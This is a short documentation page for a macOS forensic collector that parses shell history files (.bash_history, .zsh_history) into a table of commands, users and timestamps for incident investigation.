Shell History
Overview
Section titled “Overview”Evidence: Shell History
Description: Collect Shell History
Category: System
Platform: macos
Short Name: shellhist
Is Parsed: Yes
Sent to Investigation Hub: Yes
Collect File(s): No
Background
Section titled “Background”This collector gathers shell history information from macOS. This data is essential for understanding user activity, detecting suspicious commands, and investigating command-based incidents.
Data Collected
Section titled “Data Collected”This collector gathers structured data about shell history.
Shell History Data
Section titled “Shell History Data”| Field | Description | Example |
|---|---|---|
Command | Command | Example value |
HistoryFile | History File | Example value |
UserId | User Id | 123 |
Timestamp | Timestamp | 2023-10-15 14:30:25+03:00 |
Collection Method
Section titled “Collection Method”This collector reads history files (e.g., .bash_history, .zsh_history) and records parsed entries into the shell_history table.
Forensic Value
Section titled “Forensic Value”This evidence is crucial for forensic investigations as it reveals executed commands, helping trace attacker actions, privilege escalation attempts, and persistence via command-line activity.